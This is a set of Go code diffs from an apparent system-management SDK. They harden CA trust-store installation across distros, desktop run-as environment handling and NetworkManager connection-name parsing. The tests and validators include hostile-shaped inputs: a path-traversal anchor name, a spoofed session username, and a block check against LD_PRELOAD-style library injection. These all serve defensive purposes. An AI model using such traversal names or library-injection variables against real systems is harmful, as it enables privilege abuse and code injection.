+	return &manager{r: runner, fsm: fsm, cfg: cfg, anchorsDir: resolveAnchorsDir(cfg.anchorsDirs)}, nil
 }
 
 // anchorPath is the on-disk path for a named anchor.
 func (m *manager) anchorPath(name string) string {
-	return m.cfg.anchorsDir + "/" + name + anchorExt
+	return m.anchorsDir + "/" + name + anchorExt
 }
 
 const anchorExt = ".crt"
@@ -206,19 +226,19 @@ func (m *manager) Remove(ctx context.Context, name string) error {
 // List enumerates the managed anchors by parsing the .crt files in the backend's
 // anchors dir. A missing dir means none. Unparseable files are skipped.
 func (m *manager) List(ctx context.Context) ([]Anchor, error) {
-	entries, err := readDir(m.cfg.anchorsDir)
+	entries, err := readDir(m.anchorsDir)
 	if err != nil {
 		if os.IsNotExist(err) {
 			return []Anchor{}, nil
 		}
-		return nil, fmt.Errorf("catrust: read %s: %w", m.cfg.anchorsDir, err)
+		return nil, fmt.Errorf("catrust: read %s: %w", m.anchorsDir, err)
 	}
 	out := make([]Anchor, 0, len(entries))
 	for _, e := range entries {
 		if e.IsDir() || !hasAnchorExt(e.Name()) {
 			continue
 		}
-		data, err := readFile(m.cfg.anchorsDir + "/" + e.Name())
+		data, err := readFile(m.anchorsDir + "/" + e.Name())
 		if err != nil {
 			continue
 		}

--- a/sys/catrust/catrust_container_test.go
+++ b/sys/catrust/catrust_container_test.go
@@ -1,15 +1,17 @@
 //go:build container
 
 // Container-based real-execution test for the CA trust-store flow. The fake-
-// runner unit tests assert the emitted update-ca-certificates argv and the file
-// written to the anchors dir; this runs the REAL update-ca-certificates and then
-// proves the installed CA actually appears in (and is removed from) the system
-// trust bundle — the security-relevant round-trip, since a trusted CA can MITM
-// any TLS connection. Anti-rot guard: a future update-ca-certificates that
-// changes its bundle path or behaviour is caught here.
+// runner unit tests assert the emitted refresh argv and the file written to the
+// anchors dir; this runs the REAL refresh tool (update-ca-certificates on
+// Debian/SUSE, update-ca-trust on Fedora/EL/Arch) and proves the installed CA
+// actually becomes trusted by — and is distrusted from — the system store. This
+// is the security-relevant round-trip: a trusted CA can MITM any TLS connection.
 //
-// Debian/CaCertificates backend only (the test image). Self-skips when
-// update-ca-certificates is absent.
+// Distro-aware: Detect() picks the backend this host provides, so the test runs
+// on EVERY supported distro with its native trust mechanism. Trust is verified
+// with `openssl verify` rather than a hardcoded bundle path — a self-signed root
+// verifies OK iff it is in the system trust store, and that probe is identical
+// across distros whose consolidated bundle paths all differ.
 package catrust
 
 import (
@@ -23,14 +25,13 @@ import (
 	"math/big"
 	"os"
 	osexec "os/exec"
+	"path/filepath"
+	"strings"
 	"testing"
 	"time"
 
 	"github.com/manchtools/power-manage-sdk/sys/exec"
 )
-
-// debianBundle is where update-ca-certificates concatenates every trusted CA.
-const debianBundle = "/etc/ssl/certs/ca-certificates.crt"
 
 // selfSignedCA returns a PEM-encoded self-signed CA certificate with the given
 // CommonName, valid 2000-2100 (spans now without using the wall clock).
@@ -56,77 +57,80 @@ func selfSignedCA(t *testing.T, cn string) []byte {
 	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
 }
 
-// bundleHasCN parses the real system CA bundle and reports whether any cert in
-// it has the given CommonName.
-func bundleHasCN(t *testing.T, cn string) bool {
-	t.Helper()
-	raw, err := os.ReadFile(debianBundle)
-	if err != nil {
-		t.Fatalf("read system bundle %s: %v", debianBundle, err)
-	}
-	for block, rest := pem.Decode(raw); block != nil; block, rest = pem.Decode(rest) {
-		if block.Type != "CERTIFICATE" {
-			continue
-		}
-		c, err := x509.ParseCertificate(block.Bytes)
-		if err != nil {
-			continue
-		}
-		if c.Subject.CommonName == cn {
-			return true
-		}
-	}
-	return false
+// caTrusted reports whether the system trust store currently trusts the CA in
+// pemPath. It uses `openssl verify`, the portable, bundle-path-independent probe:
+// a self-signed root verifies OK iff it is in the system trust store. This works
+// uniformly across the Debian/SUSE update-ca-certificates and the Fedora/EL/Arch
+// update-ca-trust flows, whose consolidated bundle locations all differ.
+func caTrusted(pemPath string) bool {
+	out, err := osexec.Command("openssl", "verify", pemPath).CombinedOutput()
+	return err == nil && strings.Contains(string(out), ": OK")
 }
 
+// TestInstallRemove_RealTrustStore_Container drives the REAL trust-store flow on
+// whatever backend this distro provides, proving an installed CA actually becomes
+// trusted and that Remove distrusts it.
 func TestInstallRemove_RealTrustStore_Container(t *testing.T) {
-	if _, err := osexec.LookPath("update-ca-certificates"); err != nil {
-		t.Skip("update-ca-certificates not on PATH")
+	if _, err := osexec.LookPath("openssl"); err != nil {
+		t.Skip("openssl not on PATH — cannot probe the system trust store")
+	}
+	backends := Detect(context.Background())
+	if len(backends) == 0 {
+		t.Skip("no CA trust-store backend detected on this host")
 	}
 	r, err := exec.NewRunner(exec.Direct)
 	if err != nil {
 		t.Fatalf("NewRunner(Direct): %v", err)
 	}
-	m, err := New(CaCertificates, r)
-	if err != nil {
-		t.Fatalf("New(CaCertificates): %v", err)
-	}
 
-	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
-	defer cancel()
+	for _, backend := range backends {
+		t.Run(backend.String(), func(t *testing.T) {
+			m, err := New(backend, r)
+			if err != nil {
+				t.Fatalf("New(%v): %v", backend, err)
+			}
+			ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+			defer cancel()
 
-	const name = "pm-container-test-ca"
-	const cn = "pm container test root"
-	pemBytes := selfSignedCA(t, cn)
+			const name = "pm-container-test-ca"
+			const cn = "pm container test root"
+			pemBytes := selfSignedCA(t, cn)
+			pemPath := filepath.Join(t.TempDir(), "ca.pem")
+			if err := os.WriteFile(pemPath, pemBytes, 0o644); err != nil {
+				t.Fatalf("write CA pem: %v", err)
+			}
+			t.Cleanup(func() { _ = m.Remove(context.Background(), name) })
 
-	t.Cleanup(func() { _ = m.Remove(context.Background(), name) })
-
-	// Install → the CA must actually appear in the real system bundle.
-	if err := m.Install(ctx, name, pemBytes); err != nil {
-		t.Fatalf("Install: %v", err)
-	}
-	if !bundleHasCN(t, cn) {
-		t.Fatalf("after Install, CA %q is NOT in the real system bundle %s — not actually trusted", cn, debianBundle)
-	}
-	anchors, err := m.List(ctx)
-	if err != nil {
-		t.Fatalf("List: %v", err)
-	}
-	found := false
-	for _, a := range anchors {
-		if a.Name == name {
-			found = true
-		}
-	}
-	if !found {
-		t.Errorf("List does not report the installed anchor %q: %+v", name, anchors)
-	}
-
-	// Remove → the CA must be gone from the real bundle (distrust took effect).
-	if err := m.Remove(ctx, name); err != nil {
-		t.Fatalf("Remove: %v", err)
-	}
-	if bundleHasCN(t, cn) {
-		t.Errorf("after Remove, CA %q is STILL in the real system bundle %s — distrust failed", cn, debianBundle)
+			if caTrusted(pemPath) {
+				t.Fatalf("CA %q is already trusted before Install — dirty test environment", cn)
+			}
+			// Install → the CA must actually become trusted by the real system store.
+			if err := m.Install(ctx, name, pemBytes); err != nil {
+				t.Fatalf("Install: %v", err)
+			}
+			if !caTrusted(pemPath) {
+				t.Fatalf("after Install via %v, CA %q is NOT trusted by the real system store", backend, cn)
+			}
+			anchors, err := m.List(ctx)
+			if err != nil {
+				t.Fatalf("List: %v", err)
+			}
+			found := false
+			for _, a := range anchors {
+				if a.Name == name {
+					found = true
+				}
+			}
+			if !found {
+				t.Errorf("List does not report the installed anchor %q: %+v", name, anchors)
+			}
+			// Remove → distrust must take effect.
+			if err := m.Remove(ctx, name); err != nil {
+				t.Fatalf("Remove: %v", err)
+			}
+			if caTrusted(pemPath) {
+				t.Errorf("after Remove via %v, CA %q is STILL trusted — distrust failed", backend, cn)
+			}
+		})
 	}
 }

--- a/sys/catrust/catrust_test.go
+++ b/sys/catrust/catrust_test.go
@@ -229,6 +229,7 @@ func TestInstall_CaCertificates(t *testing.T) {
 }
 
 func TestInstall_P11Kit(t *testing.T) {
+	withAnchorsDirs(t, nil) // no candidate dir present → P11Kit defaults to the Fedora/EL dir
 	ff := &fakeFS{}
 	m, r := newMgr(t, P11Kit, ff)
 	r.Push(exec.Result{}, nil)
@@ -241,6 +242,35 @@ func TestInstall_P11Kit(t *testing.T) {
 	c := r.Calls()[0]
 	if strings.Join(append([]string{c.Name}, c.Args...), " ") != "update-ca-trust extract" {
 		t.Errorf("p11kit refresh = %v", append([]string{c.Name}, c.Args...))
+	}
+}
+
+// withAnchorsDirs fakes the dir-existence seam so anchors-dir resolution is
+// host-independent: only the listed dirs "exist".
+func withAnchorsDirs(t *testing.T, present []string) {
+	t.Helper()
+	prev := anchorsDirExists
+	t.Cleanup(func() { anchorsDirExists = prev })
+	set := make(map[string]bool, len(present))
+	for _, p := range present {
+		set[p] = true
+	}
+	anchorsDirExists = func(p string) bool { return set[p] }
+}
+
+// TestInstall_P11Kit_ResolvesArchAnchorsDir: Fedora/EL and Arch both use
+// update-ca-trust but read DIFFERENT anchors dirs. When only the Arch dir exists,
+// the P11Kit backend must write there (not the Fedora dir).
+func TestInstall_P11Kit_ResolvesArchAnchorsDir(t *testing.T) {
+	withAnchorsDirs(t, []string{"/etc/ca-certificates/trust-source/anchors"})
+	ff := &fakeFS{}
+	m, r := newMgr(t, P11Kit, ff)
+	r.Push(exec.Result{}, nil)
+	if err := m.Install(context.Background(), "acme-root", validCAPEM(t)); err != nil {
+		t.Fatal(err)
+	}
+	if ff.writes[0].path != "/etc/ca-certificates/trust-source/anchors/acme-root.crt" {
+		t.Errorf("p11kit Arch path = %q, want the Arch anchors dir", ff.writes[0].path)
 	}
 }
 

--- a/sys/catrust/catrust_test.go
+++ b/sys/catrust/catrust_test.go
@@ -110,10 +110,31 @@ func TestNew_UnknownBackend(t *testing.T) {
 
 func TestNew_Backends(t *testing.T) {
 	withFakeFS(t, &fakeFS{})
-	for _, b := range []Backend{CaCertificates, P11Kit} {
+	for _, b := range []Backend{CaCertificates, P11Kit, SuseCaCertificates} {
 		if _, err := New(b, exectest.New(exec.Direct)); err != nil {
 			t.Errorf("New(%v): %v", b, err)
 		}
+	}
+}
+
+// TestInstall_SuseWritesToTrustAnchors pins the SUSE backend's distinct anchors
+// dir + refresh command — SUSE's update-ca-certificates reads /etc/pki/trust/anchors,
+// NOT Debian's /usr/local/share/ca-certificates.
+func TestInstall_SuseWritesToTrustAnchors(t *testing.T) {
+	ff := &fakeFS{}
+	m, r := newMgr(t, SuseCaCertificates, ff)
+	if err := m.Install(context.Background(), "corp-root", validCAPEM(t)); err != nil {
+		t.Fatalf("Install: %v", err)
+	}
+	if len(ff.writes) != 1 || ff.writes[0].path != "/etc/pki/trust/anchors/corp-root.crt" {
+		t.Fatalf("anchor written to %v, want /etc/pki/trust/anchors/corp-root.crt", ff.writes)
+	}
+	calls := r.Calls()
+	if len(calls) != 1 || calls[0].Name != "update-ca-certificates" {
+		t.Fatalf("refresh = %+v, want a single `update-ca-certificates`", calls)
+	}
+	if !calls[0].Escalate {
+		t.Error("trust-store refresh must escalate")
 	}
 }
 
@@ -136,7 +157,7 @@ func TestNew_PropagatesFSError(t *testing.T) {
 }
 
 func TestBackendString(t *testing.T) {
-	cases := map[Backend]string{CaCertificates: "ca-certificates", P11Kit: "p11-kit", Backend(0): "Backend(0)"}
+	cases := map[Backend]string{CaCertificates: "ca-certificates", P11Kit: "p11-kit", SuseCaCertificates: "suse-ca-certificates", Backend(0): "Backend(0)"}
 	for b, want := range cases {
 		if got := b.String(); got != want {
 			t.Errorf("Backend(%d).String() = %q, want %q", int(b), got, want)
@@ -410,22 +431,29 @@ func TestDetect(t *testing.T) {
 	cases := []struct {
 		name    string
 		present map[string]bool
+		suseDir bool // /etc/pki/trust/anchors exists → SUSE, not Debian
 		want    []Backend
 	}{
-		{"none", map[string]bool{}, nil},
-		{"debian", map[string]bool{"update-ca-certificates": true}, []Backend{CaCertificates}},
-		{"fedora", map[string]bool{"update-ca-trust": true}, []Backend{P11Kit}},
-		{"both", map[string]bool{"update-ca-certificates": true, "update-ca-trust": true}, []Backend{CaCertificates, P11Kit}},
+		{"none", map[string]bool{}, false, nil},
+		// Debian and SUSE both ship `update-ca-certificates`; the anchors dir
+		// disambiguates them.
+		{"debian", map[string]bool{"update-ca-certificates": true}, false, []Backend{CaCertificates}},
+		{"suse", map[string]bool{"update-ca-certificates": true}, true, []Backend{SuseCaCertificates}},
+		{"fedora", map[string]bool{"update-ca-trust": true}, false, []Backend{P11Kit}},
+		{"both-debian", map[string]bool{"update-ca-certificates": true, "update-ca-trust": true}, false, []Backend{CaCertificates, P11Kit}},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
-			prev := lookPath
-			t.Cleanup(func() { lookPath = prev })
+			prevLook, prevDir := lookPath, anchorsDirExists
+			t.Cleanup(func() { lookPath, anchorsDirExists = prevLook, prevDir })
 			lookPath = func(name string) (string, error) {
 				if tc.present[name] {
 					return "/usr/sbin/" + name, nil
 				}
 				return "", errors.New("no")
+			}
+			anchorsDirExists = func(path string) bool {
+				return tc.suseDir && path == "/etc/pki/trust/anchors"
 			}
 			got := Detect(context.Background())
 			if len(got) != len(tc.want) {

--- a/sys/catrust/catrust_test.go
+++ b/sys/catrust/catrust_test.go
@@ -25,6 +25,11 @@ import (
 // window — the fixture for the validation matrix and the List parse.
 func genCert(t *testing.T, cn string, isCA bool, notBefore, notAfter time.Time) []byte {
 	t.Helper()
+	return genCertWithKeyUsage(t, cn, isCA, notBefore, notAfter, x509.KeyUsageCertSign|x509.KeyUsageDigitalSignature)
+}
+
+func genCertWithKeyUsage(t *testing.T, cn string, isCA bool, notBefore, notAfter time.Time, usage x509.KeyUsage) []byte {
+	t.Helper()
 	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
 	if err != nil {
 		t.Fatal(err)
@@ -36,7 +41,7 @@ func genCert(t *testing.T, cn string, isCA bool, notBefore, notAfter time.Time) 
 		NotAfter:              notAfter,
 		IsCA:                  isCA,
 		BasicConstraintsValid: true,
-		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
+		KeyUsage:              usage,
 	}
 	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
 	if err != nil {
@@ -162,6 +167,7 @@ func TestValidateCACert(t *testing.T) {
 	}{
 		{"valid CA", genCert(t, "CA", true, now.Add(-time.Hour), now.Add(time.Hour)), false},
 		{"not a CA (leaf)", genCert(t, "leaf", false, now.Add(-time.Hour), now.Add(time.Hour)), true},
+		{"CA without keyCertSign usage", genCertWithKeyUsage(t, "ca-no-sign", true, now.Add(-time.Hour), now.Add(time.Hour), x509.KeyUsageDigitalSignature), true},
 		{"expired", genCert(t, "old", true, now.Add(-48*time.Hour), now.Add(-time.Hour)), true},
 		{"not yet valid", genCert(t, "future", true, now.Add(time.Hour), now.Add(48*time.Hour)), true},
 		{"garbage", []byte("not a pem"), true},

--- a/sys/catrust/detect.go
+++ b/sys/catrust/detect.go
@@ -28,7 +28,7 @@ func Detect(ctx context.Context) []Backend {
 	if _, err := lookPath("update-ca-certificates"); err == nil {
 		// Debian and SUSE both ship `update-ca-certificates` but read different
 		// anchor dirs; the SUSE anchors dir's presence selects the SUSE backend.
-		if anchorsDirExists(backends[SuseCaCertificates].anchorsDir) {
+		if anchorsDirExists(backends[SuseCaCertificates].anchorsDirs[0]) {
 			out = append(out, SuseCaCertificates)
 		} else {
 			out = append(out, CaCertificates)

--- a/sys/catrust/detect.go
+++ b/sys/catrust/detect.go
@@ -2,11 +2,20 @@ package catrust
 
 import (
 	"context"
+	"os"
 	osexec "os/exec"
 )
 
 // lookPath is a package-var seam so Detect is deterministically testable.
 var lookPath = osexec.LookPath
+
+// anchorsDirExists reports whether a trust-anchors directory is present. A seam
+// so Detect's Debian-vs-SUSE disambiguation (both ship `update-ca-certificates`)
+// is deterministically testable.
+var anchorsDirExists = func(path string) bool {
+	fi, err := os.Stat(path)
+	return err == nil && fi.IsDir()
+}
 
 // Detect reports the trust-store backends usable on THIS host: CaCertificates
 // when update-ca-certificates is on PATH, P11Kit when update-ca-trust is. It
@@ -17,7 +26,13 @@ func Detect(ctx context.Context) []Backend {
 	_ = ctx
 	var out []Backend
 	if _, err := lookPath("update-ca-certificates"); err == nil {
-		out = append(out, CaCertificates)
+		// Debian and SUSE both ship `update-ca-certificates` but read different
+		// anchor dirs; the SUSE anchors dir's presence selects the SUSE backend.
+		if anchorsDirExists(backends[SuseCaCertificates].anchorsDir) {
+			out = append(out, SuseCaCertificates)
+		} else {
+			out = append(out, CaCertificates)
+		}
 	}
 	if _, err := lookPath("update-ca-trust"); err == nil {
 		out = append(out, P11Kit)

--- a/sys/catrust/security_machine_test.go
+++ b/sys/catrust/security_machine_test.go
@@ -1,0 +1,85 @@
+package catrust
+
+import (
+	"context"
+	"crypto/x509"
+	"errors"
+	"testing"
+	"time"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+)
+
+type trustAnchorAction int
+
+const (
+	trustAnchorValidRoot trustAnchorAction = iota
+	trustAnchorLeafCert
+	trustAnchorCAWithoutCertSign
+	trustAnchorFutureCA
+	trustAnchorPathName
+)
+
+type trustAnchorStep struct {
+	name    string
+	action  trustAnchorAction
+	wantErr error
+}
+
+// TestTrustAnchorSecurityMachine models system trust-store mutation as a CA
+// capability state machine. Only a currently valid CA certificate with signing
+// key usage may transition into the host trust store; every rejected state must
+// stop before anchor write or trust-store refresh.
+func TestTrustAnchorSecurityMachine(t *testing.T) {
+	steps := []trustAnchorStep{
+		{name: "valid root CA is accepted", action: trustAnchorValidRoot},
+		{name: "leaf certificate is rejected", action: trustAnchorLeafCert, wantErr: ErrInvalidCert},
+		{name: "CA without keyCertSign is rejected", action: trustAnchorCAWithoutCertSign, wantErr: ErrInvalidCert},
+		{name: "future CA is rejected", action: trustAnchorFutureCA, wantErr: ErrInvalidCert},
+		{name: "path-shaped name is rejected", action: trustAnchorPathName, wantErr: ErrInvalidName},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			ff := &fakeFS{}
+			m, r := newMgr(t, CaCertificates, ff)
+			r.Push(exec.Result{}, nil)
+			name, cert := trustAnchorInput(t, step.action)
+			err := m.Install(context.Background(), name, cert)
+			if step.wantErr != nil {
+				if !errors.Is(err, step.wantErr) {
+					t.Fatalf("Install(%s) = %v, want %v", step.name, err, step.wantErr)
+				}
+				if len(ff.writes) != 0 || len(r.Calls()) != 0 {
+					t.Fatalf("%s reached trust-store side effects: writes=%+v calls=%+v", step.name, ff.writes, r.Calls())
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+			if len(ff.writes) != 1 || len(r.Calls()) != 1 {
+				t.Fatalf("accepted anchor side effects = writes=%d calls=%d, want one write and one refresh", len(ff.writes), len(r.Calls()))
+			}
+		})
+	}
+}
+
+func trustAnchorInput(t *testing.T, action trustAnchorAction) (string, []byte) {
+	t.Helper()
+	now := time.Now()
+	switch action {
+	case trustAnchorValidRoot:
+		return "corp-root", genCert(t, "corp-root", true, now.Add(-time.Hour), now.Add(time.Hour))
+	case trustAnchorLeafCert:
+		return "leaf", genCert(t, "leaf", false, now.Add(-time.Hour), now.Add(time.Hour))
+	case trustAnchorCAWithoutCertSign:
+		return "ca-no-sign", genCertWithKeyUsage(t, "ca-no-sign", true, now.Add(-time.Hour), now.Add(time.Hour), x509.KeyUsageDigitalSignature)
+	case trustAnchorFutureCA:
+		return "future-root", genCert(t, "future-root", true, now.Add(time.Hour), now.Add(2*time.Hour))
+	case trustAnchorPathName:
+		return "../corp-root", genCert(t, "corp-root", true, now.Add(-time.Hour), now.Add(time.Hour))
+	default:
+		return "corp-root", genCert(t, "corp-root", true, now.Add(-time.Hour), now.Add(time.Hour))
+	}
+}

--- a/sys/catrust/validate.go
+++ b/sys/catrust/validate.go
@@ -40,6 +40,14 @@ func validateCACert(certPEM []byte) error {
 	if !cert.IsCA {
 		return fmt.Errorf("%w: certificate %q is not a CA (BasicConstraints CA=false)", ErrInvalidCert, cert.Subject.CommonName)
 	}
+	// A real CA signs other certificates, so it must carry the keyCertSign key
+	// usage. A cert without it (e.g. a leaf or a deliberately weakened anchor) is
+	// not usable for path validation as a trust anchor and must never enter the
+	// system trust store — installing it would let any host it trusts MITM TLS
+	// without the cert even being a valid issuer. Fail closed.
+	if cert.KeyUsage&x509.KeyUsageCertSign == 0 {
+		return fmt.Errorf("%w: certificate %q lacks the keyCertSign key usage (not a usable CA)", ErrInvalidCert, cert.Subject.CommonName)
+	}
 	now := time.Now()
 	if now.Before(cert.NotBefore) {
 		return fmt.Errorf("%w: certificate is not valid until %s", ErrInvalidCert, cert.NotBefore.UTC())

--- a/sys/desktop/desktop.go
+++ b/sys/desktop/desktop.go
@@ -56,6 +56,13 @@ const loginctlPath = "/usr/bin/loginctl"
 // every supported distro ships.
 const runuserPath = "/usr/sbin/runuser"
 
+// envPath pins the absolute path to env. RunAsCommand wraps the user command in
+// `env PATH=<curated>` so the curated PATH is re-applied AFTER runuser's PAM
+// session — some distros (openSUSE: login.defs ALWAYS_SET_PATH) reset PATH during
+// the session setup, which would otherwise strip the curated value we set in the
+// child env. Pinned absolute for the same PATH-injection reason as runuserPath.
+const envPath = "/usr/bin/env"
+
 // Test seams. They default to the real lookups and are overridden only by tests
 // to exercise branches that are otherwise host-dependent (loginctl absent, a
 // passwd entry that does not resolve or carries a non-numeric uid/gid).

--- a/sys/desktop/runas.go
+++ b/sys/desktop/runas.go
@@ -5,6 +5,8 @@ import (
 	"fmt"
 	osexec "os/exec"
 	"strings"
+
+	pmexec "github.com/manchtools/power-manage-sdk/sys/exec"
 )
 
 // EnvFor builds the minimum environment a user-scoped command needs
@@ -79,6 +81,18 @@ func (m *manager) RunAsCommand(ctx context.Context, s Session, opts RunAsOptions
 	if s.Username == "" {
 		return nil, fmt.Errorf("desktop.RunAsCommand: session has empty Username")
 	}
+	// opts.ExtraEnv is merged into the child environment, so it is an injection
+	// surface exactly like Command.Env on the Runner path: a caller-supplied
+	// LD_PRELOAD / LD_LIBRARY_PATH / GCONV_PATH would load attacker-controlled
+	// code into the user-scoped command and anything it execs. Gate it through the
+	// SAME hijack-blocklist the Runner enforces (exec.ValidateCommandEnv), failing
+	// closed BEFORE the *exec.Cmd is built. PATH is exempt from the gate here
+	// because RunAsCommand never forwards a caller PATH — it always re-applies the
+	// curated UserPath last (see below), so a "PATH=" entry is inert by design and
+	// must not be treated as a rejection.
+	if err := validateExtraEnv(opts.ExtraEnv); err != nil {
+		return nil, err
+	}
 	full := append([]string{"-u", s.Username, "--", name}, args...)
 	cmd := osexec.CommandContext(ctx, runuserPath, full...)
 	// Replace inherited env wholesale — agent's env (LD_PRELOAD,
@@ -92,4 +106,22 @@ func (m *manager) RunAsCommand(ctx context.Context, s Session, opts RunAsOptions
 	cmd.Env = env
 	cmd.Dir = s.Home
 	return cmd, nil
+}
+
+// validateExtraEnv runs the caller's ExtraEnv through the Runner's env hijack
+// gate (exec.ValidateCommandEnv) so a desktop run-as inherits the same
+// LD_PRELOAD/LD_LIBRARY_PATH/GCONV_PATH refusal as every Runner-driven command.
+// PATH entries are dropped before the gate: RunAsCommand always overrides PATH
+// with the curated UserPath, so a caller "PATH=" value is inert and is not a
+// hijack — exec.ValidateCommandEnv would otherwise reject it (PATH is on the
+// blocklist) and break the documented PATH-is-re-applied contract.
+func validateExtraEnv(extraEnv []string) error {
+	filtered := make([]string, 0, len(extraEnv))
+	for _, e := range extraEnv {
+		if key, _, ok := strings.Cut(e, "="); ok && key == "PATH" {
+			continue // overridden by UserPath; never forwarded, so never a hijack
+		}
+		filtered = append(filtered, e)
+	}
+	return pmexec.ValidateCommandEnv(filtered)
 }

--- a/sys/desktop/runas.go
+++ b/sys/desktop/runas.go
@@ -93,7 +93,13 @@ func (m *manager) RunAsCommand(ctx context.Context, s Session, opts RunAsOptions
 	if err := validateExtraEnv(opts.ExtraEnv); err != nil {
 		return nil, err
 	}
-	full := append([]string{"-u", s.Username, "--", name}, args...)
+	// Wrap the command in `env PATH=<curated>`: runuser's PAM session can reset
+	// PATH from /etc/login.defs (openSUSE sets ALWAYS_SET_PATH), which would strip
+	// the curated PATH we put in cmd.Env. The env wrapper re-applies it AFTER the
+	// session is set up, running as the target user, so the curated UserPath always
+	// wins regardless of the distro's login.defs. (cmd.Env still carries PATH for
+	// distros that don't reset it; the wrapper is the portable guarantee.)
+	full := append([]string{"-u", s.Username, "--", envPath, "PATH=" + UserPath(s), name}, args...)
 	cmd := osexec.CommandContext(ctx, runuserPath, full...)
 	// Replace inherited env wholesale — agent's env (LD_PRELOAD,
 	// LD_LIBRARY_PATH, etc.) must not leak into a user-scoped command.

--- a/sys/desktop/runas_test.go
+++ b/sys/desktop/runas_test.go
@@ -42,7 +42,11 @@ func TestRunAsCommand_BuildsRunuserInvocation(t *testing.T) {
 		t.Errorf("Path: got %q, want %q (runuser is the only acceptable wrapper)", cmd.Path, runuserPath)
 	}
 
-	wantArgs := []string{runuserPath, "-u", "alice", "--", "/usr/bin/flatpak", "--user", "info", "org.example.App"}
+	// The curated PATH is forced via an `env PATH=…` wrapper that runs AFTER
+	// runuser's PAM session, so a distro whose login.defs resets PATH (openSUSE's
+	// ALWAYS_SET_PATH) cannot strip it. The wrapper sits between `--` and the
+	// real command.
+	wantArgs := []string{runuserPath, "-u", "alice", "--", envPath, "PATH=" + UserPath(s), "/usr/bin/flatpak", "--user", "info", "org.example.App"}
 	if len(cmd.Args) != len(wantArgs) {
 		t.Fatalf("Args length: got %d, want %d (got=%v)", len(cmd.Args), len(wantArgs), cmd.Args)
 	}

--- a/sys/desktop/sessions.go
+++ b/sys/desktop/sessions.go
@@ -191,9 +191,22 @@ func (m *manager) loadSession(ctx context.Context, id string) (Session, bool, er
 		return Session{}, false, fmt.Errorf("non-numeric GID %q for user %q", u.Gid, u.Username)
 	}
 
+	// Cross-check the name logind reports against the passwd entry for that UID.
+	// We resolve $HOME/GID by the numeric UID but otherwise trust loginctl's
+	// Name; if the two disagree, the host's logind output and /etc/passwd are
+	// inconsistent (a compromised/spoofed loginctl, or a UID reused under a new
+	// name mid-session). Trusting the mismatched Name would fan a command out
+	// "as <Name>" while resolving $HOME/runtime against a DIFFERENT account — a
+	// confused-deputy. Fail closed rather than act on the ambiguity.
+	if props["Name"] != u.Username {
+		return Session{}, false, fmt.Errorf(
+			"loginctl Name=%q disagrees with passwd username %q for uid %d in session %q",
+			props["Name"], u.Username, uid, id)
+	}
+
 	return Session{
 		ID:         id,
-		Username:   props["Name"],
+		Username:   u.Username,
 		UID:        uid,
 		GID:        gid,
 		Home:       u.HomeDir,

--- a/sys/desktop/sessions_test.go
+++ b/sys/desktop/sessions_test.go
@@ -301,6 +301,16 @@ func TestLoadSession_Branches(t *testing.T) {
 			t.Error("a passwd entry with a non-numeric gid must error")
 		}
 	})
+	t.Run("logind name must match passwd uid", func(t *testing.T) {
+		stubLookupID(t, func(uid string) (*user.User, error) {
+			return &user.User{Uid: uid, Gid: "1000", Username: "alice", HomeDir: "/home/alice"}, nil
+		})
+		m, r := newManager(t)
+		r.Push(exec.Result{Stdout: props("mallory", "1000", "wayland", "yes", "no")}, nil)
+		if _, _, err := m.loadSession(context.Background(), "c1"); err == nil {
+			t.Error("mismatched logind Name and passwd username must fail closed")
+		}
+	})
 	t.Run("success builds session", func(t *testing.T) {
 		stubLookupID(t, func(string) (*user.User, error) { return liveResultUser, nil })
 		m, r := newManager(t)

--- a/sys/dns/networkmanager.go
+++ b/sys/dns/networkmanager.go
@@ -77,6 +77,14 @@ func (m *nmManager) Apply(ctx context.Context, cfg Config) error {
 
 // activeConnection resolves the connection name bound to iface. Returns an error
 // if the interface has no active connection (nothing to modify).
+//
+// The resolved name comes from `nmcli ... device show` — UNTRUSTED host output —
+// and is then placed on the argv of an escalated `connection modify` / `connection
+// up`. A hostile or compromised NetworkManager (or a connection an attacker named)
+// could emit a value that, fed back verbatim, smuggles a flag (a leading '-') or
+// splits into extra tokens (an embedded newline/control char). The name is
+// re-validated here, before any mutation, so host output can never become a
+// privileged argv injection.
 func (m *nmManager) activeConnection(ctx context.Context, iface string) (string, error) {
 	out, err := runRead(ctx, m.r, "nmcli", "-g", "GENERAL.CONNECTION", "device", "show", iface)
 	if err != nil {
@@ -86,5 +94,26 @@ func (m *nmManager) activeConnection(ctx context.Context, iface string) (string,
 	if conn == "" || conn == "--" {
 		return "", fmt.Errorf("%w: interface %q has no active NetworkManager connection to configure", ErrInvalidConfig, iface)
 	}
+	if err := validateConnName(conn); err != nil {
+		return "", err
+	}
 	return conn, nil
+}
+
+// validateConnName re-validates an nmcli connection name read back from untrusted
+// host output before it is used in an escalated mutation. A legitimate connection
+// name may contain spaces ("Wired connection 1"), so spaces are allowed; but the
+// name must not contain control characters (an embedded newline/CR/tab/NUL would
+// split into extra argv tokens or corrupt line-oriented output) and must not begin
+// with '-' (which nmcli would parse as a flag rather than a connection name).
+func validateConnName(name string) error {
+	for _, r := range name {
+		if r < 0x20 || r == 0x7f {
+			return fmt.Errorf("%w: connection name %q from host output contains a control character", ErrInvalidConfig, name)
+		}
+	}
+	if strings.HasPrefix(name, "-") {
+		return fmt.Errorf("%w: connection name %q from host output is flag-shaped (leading '-')", ErrInvalidConfig, name)
+	}
+	return nil
 }

--- a/sys/dns/networkmanager.go
+++ b/sys/dns/networkmanager.go
@@ -70,6 +70,14 @@ func (m *nmManager) Apply(ctx context.Context, cfg Config) error {
 		return fmt.Errorf("nmcli connection modify %s: %w", conn, err)
 	}
 	if err := runPriv(ctx, m.r, "nmcli", "connection", "up", conn); err != nil {
+		// Reactivation failed AFTER the modify, which NetworkManager has already
+		// persisted — so the new (possibly attacker-influenced) DNS is now staged
+		// in the saved profile and would take effect on the next activation. Roll
+		// it back: clear the staged DNS fields so a failed apply leaves no
